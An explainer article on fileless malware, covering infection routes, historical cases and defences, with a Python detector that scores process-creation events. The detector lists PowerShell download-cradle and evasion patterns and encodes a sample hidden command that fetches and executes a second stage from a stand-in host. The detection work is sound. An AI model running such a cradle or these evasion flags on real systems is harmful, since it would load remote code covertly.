Fileless malware attacks rely on malware that does not infect a computer by writing a traditional executable to disk. Instead, the malicious code runs from the computer's memory and abuses legitimate software that is already present on the system, such as PowerShell, WMI or Office macros, to carry out its activities.

Fileless malware is therefore harder to detect than traditional malware: file-based defences have no file on disk to examine, and the activity blends in with legitimate system tools. It typically gains a foothold by exploiting vulnerabilities in the operating system or other applications, and often relies on social engineering to trick users into executing malicious commands themselves.

How fileless malware attacks work

Because this type of malicious software resides in the memory of a compromised system rather than on the hard drive, traditional antivirus software, which scans files on disk, has difficulty both detecting and removing it. It is therefore important to counter these threats with preventive measures that stop the malware from ever being executed on the PC.

There are several ways in which a user can become infected with fileless malware:

Phishing attacks: fileless malware is frequently distributed via phishing emails or other social engineering techniques. The attacker sends an email with a malicious link or attachment which, when opened, runs malicious commands on the user's system (for example, a document macro that launches PowerShell) rather than installing a conventional program.

Compromised websites: visiting a website that has been compromised can allow malicious code to be loaded into memory through exploit kits, which exploit vulnerabilities in the user's browser, browser plug-ins or operating system.

Malvertising: cyber criminals can use malvertising, or malicious advertisements, to distribute fileless malware. These ads can appear on legitimate websites and can infect a user's system when the ad is clicked or, in drive-by cases, merely displayed.

Software vulnerabilities: Malware can exploit vulnerabilities in legitimate software to gain access to a user's system. It is important to keep your software up to date to prevent these types of attacks.

Once the malware is running in the system's memory, it can exploit further vulnerabilities to escalate to administrator privileges and move laterally to other systems. In some cases it also performs a range of malicious operations, such as stealing sensitive information or encrypting the victim's data and then demanding a ransom to restore the files. Note that "fileless" does not always mean "gone after a reboot": persistence is often achieved without an executable on disk, for example through registry run keys or WMI event subscriptions.

A known threat

Fileless malware is nothing new. The first widely known example was identified over twenty years ago, in 2001, when servers running Microsoft's Internet Information Services (IIS) were targeted. The worm, dubbed Code Red, ran entirely in memory and reached about 359,000 servers before it was analysed by security researchers. Similar techniques were used in the following years for other attacks. In 2015, the Duqu 2.0 malware was used against one of the leading IT security companies, Kaspersky Lab, again operating from the memory of the victim machines. These techniques have developed rapidly in recent years, and the use of fileless malware by cyber criminals is increasingly widespread, helped by readily available tools that make this type of malware easy to build.

How to defend against fileless malware attacks

To protect yourself from fileless malware, traditional antivirus products, which look for traces inside files, are not enough. It is important to keep software and operating systems updated with the latest security patches and to educate users about the risks and how to avoid falling victim to social engineering tactics. Additionally, in a corporate setting, implementing strict access controls and limiting administrative privileges can reduce the impact of a fileless malware attack, and monitoring process behaviour (which parent processes launch script interpreters, and with what command lines) catches what file scanning cannot.
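As an added example (not code from the original article), the following Python triages process-creation telemetry for the behaviour described above: a document opened from a phishing mail spawning PowerShell with a hidden window and a base64-encoded download cradle. File scanning sees nothing, because the second stage is fetched straight into memory; the parent/child relationship and the decoded command line give it away. The event shape, field names and the three sample events are constructed for this demo (hypothetical, not real telemetry); the one piece of real behaviour relied on is that PowerShell's -EncodedCommand takes base64 of UTF-16LE text.

```python
import base64
import re

# Built-in script hosts that fileless tradecraft commonly abuses.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Document and mail applications that should almost never launch a script host.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "acrord32.exe"}
# Strings typical of in-memory download-and-execute cradles (matched case-insensitively).
CRADLE_PATTERNS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"Net\.WebClient", r"Invoke-WebRequest", r"FromBase64String",
    r"\[Reflection\.Assembly\]::Load", r"Start-Process",
]
# PowerShell switches that hide the window or disable safeguards.
EVASION_FLAGS = [
    r"-w(?:indowstyle)?\s+hidden", r"-nop(?:rofile)?\b",
    r"-noni(?:nteractive)?\b", r"-ex(?:ecutionpolicy)?\s+bypass",
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_for_powershell(script):
    """Encode text the way PowerShell's -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: malformed or deliberately mangled


def triage_event(event):
    """Score one process-creation event and list the reasons for the score."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmdline = event["cmdline"]
    score, reasons = 0, []
    if image in SCRIPT_HOSTS and parent in DOCUMENT_APPS:
        score += 3
        reasons.append(f"document app {parent} spawned script host {image}")
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command decoded")
        text += " " + decoded  # scan the wrapper and the hidden payload together
    for pattern in EVASION_FLAGS:
        if re.search(pattern, text, re.I):
            score += 1
            reasons.append(f"evasion flag {pattern}")
    for pattern in CRADLE_PATTERNS:
        if re.search(pattern, text, re.I):
            score += 2
            reasons.append(f"download/exec cradle {pattern}")
    return score, reasons


def triage(events, threshold=4):
    """Return events scoring at or above threshold, most suspicious first."""
    hits = []
    for event in events:
        score, reasons = triage_event(event)
        if score >= threshold:
            hits.append({"score": score, "cmdline": event["cmdline"], "reasons": reasons})
    return sorted(hits, key=lambda hit: hit["score"], reverse=True)


# Constructed sample events (hypothetical): a macro-launched cradle, a legitimate
# scheduled admin script, and a normal service host.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -EncodedCommand "
                + encode_for_powershell(CRADLE)},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["cmdline"][:60])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Only the first event crosses the threshold: the legitimate backup script uses -ExecutionPolicy Bypass (one point) but has an ordinary parent and no cradle, so it stays below it. The indicator lists and weights are illustrative and need tuning against your own baseline; in a real deployment the events would come from Sysmon Event ID 1 or an EDR feed rather than a hard-coded list.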

5 Rules to avoid being infected with fileless malware:

  1. always install operating system and application updates promptly;
  2. never open attachments to emails of dubious origin;
  3. monitor system memory and process behaviour, not just files on disk;
  4. only install software from trusted sources;
  5. scan every file downloaded from the internet with dedicated tools before opening it.
